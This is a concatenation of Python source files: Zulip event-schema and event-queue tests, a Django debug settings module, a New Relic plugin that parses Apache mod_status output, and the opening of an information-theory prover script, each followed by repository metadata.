        events = self.do_test(lambda: self.send_message("hamlet@zulip.com", "Verona", Recipient.STREAM, "hello"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

        # Verify the editing-a-message event as well.
        schema_checker = check_dict([
            ('type', equals('update_message')),
            ('flags', check_list(None)),
            ('content', check_string),
            ('edit_timestamp', check_int),
            ('message_id', check_int),
            ('message_ids', check_list(check_int)),
            ('orig_content', check_string),
            ('orig_rendered_content', check_string),
            ('orig_subject', check_string),
            ('propagate_mode', check_string),
            ('rendered_content', check_string),
            ('sender', check_string),
            ('stream_id', check_int),
            ('subject', check_string),
            ('subject_links', check_list(None)),
            # There is also a timestamp field in the event, but we ignore it, as
            # it's kind of an unwanted but harmless side effect of calling log_event.
        ])
        message = Message.objects.order_by('-id')[0]
        topic = 'new_topic'
        propagate_mode = 'change_all'
        content = 'new content'
        rendered_content = render_markdown(message, content)
        events = self.do_test(lambda: do_update_message(self.user_profile, message, topic, propagate_mode, content, rendered_content))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_pointer_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('pointer')),
            ('pointer', check_int)
        ])
        events = self.do_test(lambda: do_update_pointer(self.user_profile, 1500))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_register_events(self):
        # type: () -> None
        realm_user_add_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('add')),
            ('person', check_dict([
                ('email', check_string),
                ('full_name', check_string),
                ('is_admin', check_bool),
                ('is_bot', check_bool),
            ])),
        ])
        stream_create_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('create')),
            ('streams', check_list(check_dict([
                ('description', check_string),
                ('invite_only', check_bool),
                ('name', check_string),
                ('stream_id', check_int),
            ])))
        ])
        events = self.do_test(lambda: self.register("test1", "test1"))
        error = realm_user_add_checker('events[0]', events[0])
        self.assert_on_error(error)
        error = stream_create_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_alert_words_events(self):
        # type: () -> None
        alert_words_checker = check_dict([
            ('type', equals('alert_words')),
            ('alert_words', check_list(check_string)),
        ])
        events = self.do_test(lambda: do_add_alert_words(self.user_profile, ["alert_word"]))
        error = alert_words_checker('events[0]', events[0])
        self.assert_on_error(error)
        events = self.do_test(lambda: do_remove_alert_words(self.user_profile, ["alert_word"]))
        error = alert_words_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_default_streams_events(self):
        # type: () -> None
        default_streams_checker = check_dict([
            ('type', equals('default_streams')),
            ('default_streams', check_list(check_dict([
                ('description', check_string),
                ('invite_only', check_bool),
                ('name', check_string),
                ('stream_id', check_int),
            ]))),
        ])
        events = self.do_test(lambda: do_add_default_stream(self.user_profile.realm, "Scotland"))
        error = default_streams_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_muted_topics_events(self):
        # type: () -> None
        muted_topics_checker = check_dict([
            ('type', equals('muted_topics')),
            ('muted_topics', check_list(check_list(check_string, 2))),
        ])
        events = self.do_test(lambda: do_set_muted_topics(self.user_profile, [[u"Denmark", u"topic"]]))
        error = muted_topics_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_full_name(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('update')),
            ('person', check_dict([
                ('email', check_string),
                ('full_name', check_string),
            ])),
        ])
        events = self.do_test(lambda: do_change_full_name(self.user_profile, 'Sir Hamlet'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_name(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('name')),
            ('value', check_string),
        ])
        events = self.do_test(lambda: do_set_realm_name(self.user_profile.realm, 'New Realm Name'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_restricted_to_domain(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('restricted_to_domain')),
            ('value', check_bool),
        ])
        # The first True is probably a noop, then we get transitions in both directions.
        for restricted_to_domain in (True, False, True):
            events = self.do_test(lambda: do_set_realm_restricted_to_domain(self.user_profile.realm, restricted_to_domain))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_invite_required(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('invite_required')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for invite_required in (False, True, False):
            events = self.do_test(lambda: do_set_realm_invite_required(self.user_profile.realm, invite_required))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_authentication_methods(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update_dict')),
            ('property', equals('default')),
            ('data', check_dict([])),
        ])
        # Test transitions; any new backends should be tested with T/T/T/F/T
        for (auth_method_dict) in \
                ({'Google': True, 'Email': True, 'GitHub': True, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': True, 'GitHub': False, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': False},
                 {'Google': True, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': False},
                 {'Google': False, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': True},
                 {'Google': False, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': True},
                 {'Google': False, 'Email': True, 'GitHub': True, 'LDAP': True, 'Dev': False}):
            events = self.do_test(lambda: do_set_realm_authentication_methods(self.user_profile.realm,
                                                                              auth_method_dict))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_invite_by_admins_only(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('invite_by_admins_only')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for invite_by_admins_only in (False, True, False):
            events = self.do_test(lambda: do_set_realm_invite_by_admins_only(self.user_profile.realm, invite_by_admins_only))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_default_language(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('default_language')),
            ('value', check_string),
        ])
        events = self.do_test(lambda: do_set_realm_default_language(self.user_profile.realm, 'de'))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_realm_create_stream_by_admins_only(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update')),
            ('property', equals('create_stream_by_admins_only')),
            ('value', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for create_stream_by_admins_only in (False, True, False):
            events = self.do_test(lambda: do_set_realm_create_stream_by_admins_only(self.user_profile.realm,
                                                                                    create_stream_by_admins_only))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_pin_stream(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('update')),
            ('property', equals('pin_to_top')),
            ('value', check_bool),
        ])
        stream = "Denmark"
        sub = get_subscription(stream, self.user_profile)
        # The first False is probably a noop, then we get transitions in both directions.
        for pinned in (False, True, False):
            events = self.do_test(lambda: do_change_subscription_property(self.user_profile, sub, stream, "pin_to_top", pinned))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_realm_message_edit_settings(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm')),
            ('op', equals('update_dict')),
            ('property', equals('default')),
            ('data', check_dict([('allow_message_editing', check_bool),
                                 ('message_content_edit_limit_seconds', check_int)])),
        ])
        # Test every transition among the four possibilities {T,F} x {0, non-0}
        for (allow_message_editing, message_content_edit_limit_seconds) in \
                ((True, 0), (False, 0), (True, 0), (False, 1234), (True, 0), (True, 1234), (True, 0),
                 (False, 0), (False, 1234), (False, 0), (True, 1234), (False, 0),
                 (True, 1234), (True, 600), (False, 600), (False, 1234), (True, 600)):
            events = self.do_test(lambda: do_set_realm_message_editing(self.user_profile.realm,
                                                                       allow_message_editing, message_content_edit_limit_seconds))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_is_admin(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_user')),
            ('op', equals('update')),
            ('person', check_dict([
                ('email', check_string),
                ('is_admin', check_bool),
            ])),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for is_admin in [False, True, False]:
            events = self.do_test(lambda: do_change_is_admin(self.user_profile, is_admin))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_twenty_four_hour_time(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_display_settings')),
            ('setting_name', equals('twenty_four_hour_time')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_twenty_four_hour_time(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_change_left_side_userlist(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('update_display_settings')),
            ('setting_name', equals('left_side_userlist')),
            ('user', check_string),
            ('setting', check_bool),
        ])
        # The first False is probably a noop, then we get transitions in both directions.
        for setting_value in [False, True, False]:
            events = self.do_test(lambda: do_change_left_side_userlist(self.user_profile, setting_value))
            error = schema_checker('events[0]', events[0])
            self.assert_on_error(error)

    def test_realm_emoji_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_emoji')),
            ('op', equals('update')),
            ('realm_emoji', check_dict([])),
        ])
        events = self.do_test(lambda: check_add_realm_emoji(get_realm_by_string_id("zulip"), "my_emoji",
                                                            "https://realm.com/my_emoji"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        events = self.do_test(lambda: do_remove_realm_emoji(get_realm_by_string_id("zulip"), "my_emoji"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_realm_filter_events(self):
        # type: () -> None
        schema_checker = check_dict([
            ('type', equals('realm_filters')),
            ('realm_filters', check_list(None)),  # TODO: validate tuples in the list
        ])
        events = self.do_test(lambda: do_add_realm_filter(get_realm_by_string_id("zulip"), "#(?P<id>[123])",
                                                          "https://realm.com/my_realm_filter/%(id)s"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        # Bug fix: previously the return value of this do_test() call was
        # discarded, so the schema check below re-validated the stale
        # events from the "add" action instead of the "remove" events.
        events = self.do_test(lambda: do_remove_realm_filter(get_realm_by_string_id("zulip"), "#(?P<id>[123])"))
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_create_bot(self):
        # type: () -> None
        bot_created_checker = check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('add')),
            ('bot', check_dict([
                ('email', check_string),
                ('user_id', check_int),
                ('full_name', check_string),
                ('api_key', check_string),
                ('default_sending_stream', check_none_or(check_string)),
                ('default_events_register_stream', check_none_or(check_string)),
                ('default_all_public_streams', check_bool),
                ('avatar_url', check_string),
            ])),
        ])
        action = lambda: self.create_bot('test-bot@zulip.com')
        events = self.do_test(action)
        # events[0] is the realm_user add event; events[1] is realm_bot.
        error = bot_created_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_change_bot_full_name(self):
        # type: () -> None
        action = lambda: do_change_full_name(self.bot, 'New Bot Name')
        events = self.do_test(action)
        error = self.realm_bot_schema('full_name', check_string)('events[1]', events[1])
        self.assert_on_error(error)

    def test_regenerate_bot_api_key(self):
        # type: () -> None
        action = lambda: do_regenerate_api_key(self.bot)
        events = self.do_test(action)
        error = self.realm_bot_schema('api_key', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_avatar_source(self):
        # type: () -> None
        action = lambda: do_change_avatar_source(self.bot, self.bot.AVATAR_FROM_USER)
        events = self.do_test(action)
        error = self.realm_bot_schema('avatar_url', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_all_public_streams(self):
        # type: () -> None
        action = lambda: do_change_default_all_public_streams(self.bot, True)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_all_public_streams', check_bool)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_sending_stream(self):
        # type: () -> None
        stream = get_stream("Rome", self.bot.realm)
        action = lambda: do_change_default_sending_stream(self.bot, stream)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_sending_stream', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_change_bot_default_events_register_stream(self):
        # type: () -> None
        stream = get_stream("Rome", self.bot.realm)
        action = lambda: do_change_default_events_register_stream(self.bot, stream)
        events = self.do_test(action)
        error = self.realm_bot_schema('default_events_register_stream', check_string)('events[0]', events[0])
        self.assert_on_error(error)

    def test_do_deactivate_user(self):
        # type: () -> None
        bot_deactivate_checker = check_dict([
            ('type', equals('realm_bot')),
            ('op', equals('remove')),
            ('bot', check_dict([
                ('email', check_string),
                ('full_name', check_string),
            ])),
        ])
        bot = self.create_bot('foo-bot@zulip.com')
        action = lambda: do_deactivate_user(bot)
        events = self.do_test(action)
        error = bot_deactivate_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_rename_stream(self):
        # type: () -> None
        realm = get_realm_by_string_id('zulip')
        stream = self.make_stream('old_name')
        new_name = u'stream with a brand new name'
        self.subscribe_to_stream(self.user_profile.email, stream.name)
        action = lambda: do_rename_stream(realm, stream.name, new_name)
        events = self.do_test(action)
        # Renaming emits an email_address update first...
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('email_address')),
            ('value', check_string),
            ('name', equals('old_name')),
        ])
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)
        # ...followed by the name update itself.
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('name')),
            ('value', equals(new_name)),
            ('name', equals('old_name')),
        ])
        error = schema_checker('events[1]', events[1])
        self.assert_on_error(error)

    def test_deactivate_stream_neversubscribed(self):
        # type: () -> None
        stream = self.make_stream('old_name')
        action = lambda: do_deactivate_stream(stream)
        events = self.do_test(action)
        schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('delete')),
            ('streams', check_list(check_dict([]))),
        ])
        error = schema_checker('events[0]', events[0])
        self.assert_on_error(error)

    def test_subscribe_other_user_never_subscribed(self):
        # type: () -> None
        action = lambda: self.subscribe_to_stream("othello@zulip.com", u"test_stream")
        events = self.do_test(action)
        schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_add')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        error = schema_checker('events[2]', events[2])
        self.assert_on_error(error)

    def test_subscribe_events(self):
        # type: () -> None
        subscription_schema_checker = check_list(
            check_dict([
                ('color', check_string),
                ('description', check_string),
                ('email_address', check_string),
                ('invite_only', check_bool),
                ('in_home_view', check_bool),
                ('name', check_string),
                ('desktop_notifications', check_bool),
                ('audible_notifications', check_bool),
                ('stream_id', check_int),
                ('subscribers', check_list(check_int)),
            ])
        )
        add_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('add')),
            ('subscriptions', subscription_schema_checker),
        ])
        remove_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('remove')),
            ('subscriptions', check_list(
                check_dict([
                    ('name', equals('test_stream')),
                    ('stream_id', check_int),
                ]),
            )),
        ])
        peer_add_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_add')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        peer_remove_schema_checker = check_dict([
            ('type', equals('subscription')),
            ('op', equals('peer_remove')),
            ('user_id', check_int),
            ('subscriptions', check_list(check_string)),
        ])
        stream_update_schema_checker = check_dict([
            ('type', equals('stream')),
            ('op', equals('update')),
            ('property', equals('description')),
            ('value', check_string),
            ('name', check_string),
        ])

        # Subscribing ourselves generates an "add" event.
        action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream")  # type: Callable
        events = self.do_test(action, event_types=["subscription", "realm_user"])
        error = add_schema_checker('events[0]', events[0])
        self.assert_on_error(error)

        # Another user subscribing generates a "peer_add" for us.
        action = lambda: self.subscribe_to_stream("othello@zulip.com", "test_stream")
        events = self.do_test(action)
        error = peer_add_schema_checker('events[0]', events[0])
        self.assert_on_error(error)

        # The other user unsubscribing generates a "peer_remove".
        stream = get_stream("test_stream", self.user_profile.realm)
        action = lambda: bulk_remove_subscriptions(
            [get_user_profile_by_email("othello@zulip.com")],
            [stream])
        events = self.do_test(action)
        error = peer_remove_schema_checker('events[0]', events[0])
        self.assert_on_error(error)

        # We ourselves unsubscribing generates a "remove".
        action = lambda: bulk_remove_subscriptions(
            [get_user_profile_by_email("hamlet@zulip.com")],
            [stream])
        events = self.do_test(action)
        error = remove_schema_checker('events[1]', events[1])
        self.assert_on_error(error)

        # Re-subscribing generates another "add".
        action = lambda: self.subscribe_to_stream("hamlet@zulip.com", "test_stream")
        events = self.do_test(action)
        error = add_schema_checker('events[1]', events[1])
        self.assert_on_error(error)

        # Changing the stream description generates a stream update event.
        action = lambda: do_change_stream_description(get_realm_by_string_id('zulip'), 'test_stream', u'new description')
        events = self.do_test(action)
        error = stream_update_schema_checker('events[0]', events[0])
        self.assert_on_error(error)
class FetchInitialStateDataTest(ZulipTestCase):
    """Checks on the visibility of bot data in the initial state payload."""

    def test_realm_bots_non_admin(self):
        # type: () -> None
        """Non-admins get an empty realm_bots list, and no bot API key
        appears anywhere in the payload."""
        user_profile = get_user_profile_by_email('cordelia@zulip.com')
        self.assertFalse(user_profile.is_realm_admin)
        state = fetch_initial_state_data(user_profile, None, "")
        self.assert_length(state['realm_bots'], 0)
        # The API key of an unrelated bot must not leak through any other
        # part of the serialized state either.
        bot_api_key = get_user_profile_by_email('notification-bot@zulip.com').api_key
        self.assertNotIn(bot_api_key, str(state))

    def test_realm_bots_admin(self):
        # type: () -> None
        """Realm admins get the full realm_bots listing."""
        user_profile = get_user_profile_by_email('hamlet@zulip.com')
        do_change_is_admin(user_profile, True)
        self.assertTrue(user_profile.is_realm_admin)
        state = fetch_initial_state_data(user_profile, None, "")
        self.assertTrue(len(state['realm_bots']) > 5)
class EventQueueTest(TestCase):
    """Exercises EventQueue: basic storage plus the collapsing rules for
    pointer events and update_message_flags events."""

    def _push_pointers(self, queue, pointer_vals):
        # Push one pointer event per value; the queue is expected to
        # collapse consecutive pointer events down to the newest one.
        for value in pointer_vals:
            queue.push({"type": "pointer",
                        "pointer": value,
                        "timestamp": str(value)})

    def test_one_event(self):
        # type: () -> None
        queue = EventQueue("1")
        self._push_pointers(queue, [1])
        self.assertFalse(queue.empty())
        self.assertEqual(queue.contents(),
                         [{"id": 0,
                           "type": "pointer",
                           "pointer": 1,
                           "timestamp": "1"}])

    def test_event_collapsing(self):
        # type: () -> None
        # A run of pointer events collapses to just the newest one.
        queue = EventQueue("1")
        self._push_pointers(queue, range(1, 10))
        self.assertEqual(queue.contents(),
                         [{"id": 8,
                           "type": "pointer",
                           "pointer": 9,
                           "timestamp": "9"}])

        # Non-collapsible events ("unknown") survive, and a newer restart
        # event supersedes an older one.
        queue = EventQueue("2")
        self._push_pointers(queue, range(1, 10))
        queue.push({"type": "unknown"})
        queue.push({"type": "restart", "server_generation": "1"})
        self._push_pointers(queue, range(11, 20))
        queue.push({"type": "restart", "server_generation": "2"})
        self.assertEqual(queue.contents(),
                         [{"id": 9, "type": "unknown"},
                          {"id": 19,
                           "type": "pointer",
                           "pointer": 19,
                           "timestamp": "19"},
                          {"id": 20,
                           "type": "restart",
                           "server_generation": "2"}])

        # Pointer events arriving after the restart collapse among
        # themselves and are appended at the end.
        self._push_pointers(queue, range(21, 23))
        self.assertEqual(queue.contents(),
                         [{"id": 9, "type": "unknown"},
                          {"id": 19,
                           "type": "pointer",
                           "pointer": 19,
                           "timestamp": "19"},
                          {"id": 20,
                           "type": "restart",
                           "server_generation": "2"},
                          {"id": 22,
                           "type": "pointer",
                           "pointer": 22,
                           "timestamp": "22"}])

    def _check_flag_collapsing(self, flag, operation):
        # Two update_message_flags events with the same flag and operation
        # should merge their message-id lists into a single event.
        queue = EventQueue("1")
        queue.push({"type": "update_message_flags",
                    "flag": flag,
                    "operation": operation,
                    "all": False,
                    "messages": [1, 2, 3, 4],
                    "timestamp": "1"})
        queue.push({"type": "update_message_flags",
                    "flag": flag,
                    "all": False,
                    "operation": operation,
                    "messages": [5, 6],
                    "timestamp": "1"})
        self.assertEqual(queue.contents(),
                         [{"id": 1,
                           "type": "update_message_flags",
                           "all": False,
                           "flag": flag,
                           "operation": operation,
                           "messages": [1, 2, 3, 4, 5, 6],
                           "timestamp": "1"}])

    def test_flag_add_collapsing(self):
        # type: () -> None
        self._check_flag_collapsing("read", "add")

    def test_flag_remove_collapsing(self):
        # type: () -> None
        self._check_flag_collapsing("collapsed", "remove")

    def test_collapse_event(self):
        # type: () -> None
        # A pointer event followed by a non-collapsible event: both remain.
        queue = EventQueue("1")
        queue.push({"type": "pointer",
                    "pointer": 1,
                    "timestamp": "1"})
        queue.push({"type": "unknown",
                    "timestamp": "1"})
        self.assertEqual(queue.contents(),
                         [{"id": 0,
                           "type": "pointer",
                           "pointer": 1,
                           "timestamp": "1"},
                          {"id": 1,
                           "type": "unknown",
                           "timestamp": "1"}])
class TestEventsRegisterAllPublicStreamsDefaults(TestCase):
    """_default_all_public_streams: an explicitly passed value always wins;
    the user's stored default is used only when the passed value is None."""

    def setUp(self):
        # type: () -> None
        self.email = 'hamlet@zulip.com'
        self.user_profile = get_user_profile_by_email(self.email)

    def _resolve(self, stored_default, passed):
        # Persist the user's stored default, then resolve against the
        # explicitly passed value.
        self.user_profile.default_all_public_streams = stored_default
        self.user_profile.save()
        return _default_all_public_streams(self.user_profile, passed)

    def test_use_passed_all_public_true_default_false(self):
        # type: () -> None
        self.assertTrue(self._resolve(False, True))

    def test_use_passed_all_public_true_default(self):
        # type: () -> None
        self.assertTrue(self._resolve(True, True))

    def test_use_passed_all_public_false_default_false(self):
        # type: () -> None
        self.assertFalse(self._resolve(False, False))

    def test_use_passed_all_public_false_default_true(self):
        # type: () -> None
        self.assertFalse(self._resolve(True, False))

    def test_use_true_default_for_none(self):
        # type: () -> None
        self.assertTrue(self._resolve(True, None))

    def test_use_false_default_for_none(self):
        # type: () -> None
        self.assertFalse(self._resolve(False, None))
class TestEventsRegisterNarrowDefaults(TestCase):
    """_default_narrow: a non-empty narrow is used as-is; an empty narrow
    falls back to the user's default events-register stream, if one is set."""

    def setUp(self):
        # type: () -> None
        self.email = 'hamlet@zulip.com'
        self.user_profile = get_user_profile_by_email(self.email)
        self.stream = get_stream('Verona', self.user_profile.realm)

    def _resolve(self, default_stream_id, narrow):
        # Persist the user's default stream id, then resolve the narrow.
        self.user_profile.default_events_register_stream_id = default_stream_id
        self.user_profile.save()
        return _default_narrow(self.user_profile, narrow)

    def test_use_passed_narrow_no_default(self):
        # type: () -> None
        result = self._resolve(None, [[u'stream', u'my_stream']])
        self.assertEqual(result, [[u'stream', u'my_stream']])

    def test_use_passed_narrow_with_default(self):
        # type: () -> None
        result = self._resolve(self.stream.id, [[u'stream', u'my_stream']])
        self.assertEqual(result, [[u'stream', u'my_stream']])

    def test_use_default_if_narrow_is_empty(self):
        # type: () -> None
        self.assertEqual(self._resolve(self.stream.id, []),
                         [[u'stream', u'Verona']])

    def test_use_narrow_if_default_is_none(self):
        # type: () -> None
        self.assertEqual(self._resolve(None, []), [])
| calvinleenyc/zulip | zerver/tests/test_events.py | Python | apache-2.0 | 49,189 |
"""
Base debug settings for a project to include via execfile().
"""
from cinch import cinch_settings
g = globals()
S = g.setdefault
# Debugging and development modes
S('DEBUG', True)
S('TEMPLATE_DEBUG', g['DEBUG'])
S('TEMPLATE_STRING_IF_INVALID', 'INVALID_CONTEXT[%s]')
# Include our sibling base settings
g.update(cinch_settings(g, 'base'))
# Directory structure
S('MEDIA_ROOT', g['TMP_DIR'].child('media'))
# Django - request pipeline
g['MIDDLEWARE_CLASSES'].append('debug_toolbar.middleware.DebugToolbarMiddleware')
# Django - installed apps
g['INSTALLED_APPS'].append(
# django-debug-toolbar: A configurable set of panels that display
# various debug information about the current request/response.
# https://github.com/django-debug-toolbar/django-debug-toolbar
'debug_toolbar'
)
| hipikat/django-cinch | cinch/settings/debug.py | Python | bsd-2-clause | 810 |
"""
ApacheHTTPD Support
"""
import logging
import re
from newrelic_plugin_agent.plugins import base
LOGGER = logging.getLogger(__name__)

# Matches "Key Name: 123.45" lines from mod_status ?auto output, capturing
# the key and the numeric value.  The original pattern used classes like
# [\w\s{1}]: inside a character class "{1}" is just the three literal
# characters "{", "1", "}" (not a repetition count), so it is dropped here
# ("1" is already covered by \w / \d).
PATTERN = re.compile(r'^([\w\s]+):\s([\d.]+)', re.M)
class ApacheHTTPD(base.HTTPStatsPlugin):
DEFAULT_QUERY = 'auto'
GUID = 'com.meetme.newrelic_apache_httpd_agent'
KEYS = {'Total Accesses': {'type': '',
'label': 'Totals/Requests',
'suffix': 'requests'},
'BusyWorkers': {'type': 'gauge',
'label': 'Workers/Busy',
'suffix': 'workers'},
'Total kBytes': {'type': '',
'label': 'Totals/Bytes Sent',
'suffix': 'kb'},
'BytesPerSec': {'type': 'gauge',
'label': 'Bytes/Per Second',
'suffix': 'bytes/sec'},
'BytesPerReq': {'type': 'gauge',
'label': 'Requests/Average Payload Size',
'suffix': 'bytes'},
'IdleWorkers': {'type': 'gauge', 'label': 'Workers/Idle',
'suffix': 'workers'},
'CPULoad': {'type': 'gauge', 'label': 'CPU Load',
'suffix': 'processes'},
'ReqPerSec': {'type': 'gauge', 'label': 'Requests/Velocity',
'suffix': 'requests/sec'},
'Uptime': {'type': 'gauge', 'label': 'Uptime', 'suffix': 'sec'},
'ConnsTotal': {'type': 'gauge', 'label': 'Connections/Total', 'suffix': 'conns'},
'ConnsAsyncWriting': {'type': 'gauge', 'label': 'Connections/AsyncWriting', 'suffix': 'conns'},
'ConnsAsyncKeepAlive': {'type': 'gauge', 'label': 'Connections/AsyncKeepAlive', 'suffix': 'conns'},
'ConnsAsyncClosing': {'type': 'gauge', 'label': 'Connections/AsyncClosing', 'suffix': 'conns'},
'_': {'type': 'gauge', 'label': 'Scoreboard/Waiting For Conn', 'suffix': 'slots'},
'S': {'type': 'gauge', 'label': 'Scoreboard/Starting Up', 'suffix': 'slots'},
'R': {'type': 'gauge', 'label': 'Scoreboard/Reading Request', 'suffix': 'slots'},
'W': {'type': 'gauge', 'label': 'Scoreboard/Sending Reply', 'suffix': 'slots'},
'K': {'type': 'gauge', 'label': 'Scoreboard/Keepalive Read', 'suffix': 'slots'},
'D': {'type': 'gauge', 'label': 'Scoreboard/DNS Lookup', 'suffix': 'slots'},
'C': {'type': 'gauge', 'label': 'Scoreboard/Closing Conn', 'suffix': 'slots'},
'L': {'type': 'gauge', 'label': 'Scoreboard/Logging', 'suffix': 'slots'},
'G': {'type': 'gauge', 'label': 'Scoreboard/Gracefully Finishing', 'suffix': 'slots'},
'I': {'type': 'gauge', 'label': 'Scoreboard/Idle Cleanup', 'suffix': 'slots'},
'.': {'type': 'gauge', 'label': 'Scoreboard/Open Slot', 'suffix': 'slots'}}
def error_message(self):
    """Log an error explaining that no stats could be parsed.

    Called when the status page content did not match any expected
    key/value pairs.

    """
    # Fixed grammar in the message ("please make ensure" -> "please ensure").
    # The %s placeholder is expanded lazily by the logging module.
    LOGGER.error('Could not match any of the stats, please ensure '
                 'Apache HTTPd is configured correctly. If you report '
                 'this as a bug, please include the full output of the '
                 'status page from %s in your ticket', self.stats_url)
def get_scoreboard(self, data):
    """Tally the worker-slot states from the mod_status scoreboard line.

    :param str data: The full status page content
    :rtype: dict

    """
    # One counter per known scoreboard state (see KEYS for their meaning).
    score_out = dict.fromkeys(
        ['_', 'S', 'R', 'W', 'K', 'D', 'C', 'L', 'G', 'I', '.'], 0)
    for line in data.splitlines():
        if 'Scoreboard' in line:
            for char in line.replace('Scoreboard: ', ''):
                # Skip unexpected characters instead of raising KeyError.
                if char in score_out:
                    score_out[char] += 1
    return score_out
def add_datapoints(self, stats):
    """Add all of the data points for a node

    :param str stats: The stats content from Apache as a string

    """
    def record(key, value):
        # Dispatch a single key/value pair to the right metric type.
        # KEYS marks instantaneous values as 'gauge'; everything else
        # is recorded as a derive (delta) metric.
        if key in self.KEYS:
            if self.KEYS[key].get('type') == 'gauge':
                self.add_gauge_value(self.KEYS[key]['label'],
                                     self.KEYS[key].get('suffix', ''),
                                     value)
            else:
                self.add_derive_value(self.KEYS[key]['label'],
                                      self.KEYS[key].get('suffix', ''),
                                      value)
        else:
            LOGGER.debug('Found unmapped key/value pair: %s = %s',
                         key, value)

    # Key/value pairs parsed from the status page text; coerce each value
    # to int, then float, falling back to 0 for non-numeric content.
    for key, value in PATTERN.findall(stats or ''):
        try:
            value = int(value)
        except ValueError:
            try:
                value = float(value)
            except ValueError:
                value = 0
        record(key, value)

    # Per-state slot counts from the scoreboard line.  Note: .items()
    # instead of the Python-2-only .iteritems(), so this also runs on
    # Python 3.
    for key, value in self.get_scoreboard(stats).items():
        record(key, value)
| notnmeyer/newrelic-plugin-agent | newrelic_plugin_agent/plugins/apache_httpd.py | Python | bsd-3-clause | 5,670 |
"""
Python Information Theoretic Inequality Prover
Usage:
pitip VARNAMES CHECK [-p]
Options:
-p, --prove Show proof
"""
import numpy as np
from .core.app import application
from .core.io import System, column_varname_labels
from .core.it import elemental_inequalities, elemental_forms
def _format_dual_coef(system, index, coef):
